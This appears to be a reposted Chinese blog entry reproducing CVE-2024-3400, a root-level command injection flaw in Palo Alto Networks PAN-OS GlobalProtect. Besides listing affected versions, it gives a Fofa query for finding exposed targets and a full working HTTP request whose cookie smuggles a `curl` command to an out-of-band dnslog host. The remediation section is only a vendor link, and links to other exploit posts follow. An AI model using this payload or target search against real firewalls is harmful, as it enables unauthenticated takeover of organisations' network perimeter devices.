（CVE-2024-3400）Palo Alto Networks PAN-OS 命令执行漏洞

2024年4月25日18:57:11评论20 views字数 771阅读2分34秒阅读模式

0x01 前言

针对特定 PAN-OS 版本和不同功能配置的 Palo Alto Networks PAN-OS 软件的 GlobalProtect 功能中的任意文件创建漏洞导致的命令注入可能使未经身份验证的攻击者能够在防火墙上以根权限执行任意代码。Cloud NGFW、Panorama 设备和 Prisma Access 不受此漏洞的影响。

0x02 影响平台

version < 11.0.4-h1version < 10.2.9-h1version < 10.2.8-h3version < 10.2.7-h8version < 10.2.6-h3version < 11.1.0-h3version < 11.1.2-h3version < 11.0.2-h4version < 11.0.3-h10

0x03 漏洞复现

Fofa: app="PaloAlto-GlobalProtect"

构造payload，发送数据包

POST /ssl-vpn/hipreport.esp HTTP/1.1Host: Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}dnslog.cn`;Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 0

查看dnslog记录

（CVE-2024-3400）Palo Alto Networks PAN-OS 命令执行漏洞

0x04 修复建议

关注厂商更新产品：https://www.paloaltonetworks.com/

0x04 参考链接

https://nvd.nist.gov/vuln/detail/CVE-2024-3400

原文始发于微信公众号（SheYin）：（CVE-2024-3400）Palo Alto Networks PAN-OS 命令执行漏洞（附edusrc邀请码）

左青龙
微信扫一扫

右白虎
微信扫一扫

（CVE-2024-3400）Palo Alto Networks PAN-OS 命令执行漏洞

CVE-2024-28253 :OpenMetadata

CVE-2024-27956 WordPress Automatic SQL注入漏洞可添加后台账号

用友NC down/bill存在SQL注入漏洞(XVE-2024-9469)

CVE-2024-23722

CVE-2024-0783

CNVD-2024-06148

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

发表评论

在线咨询

微信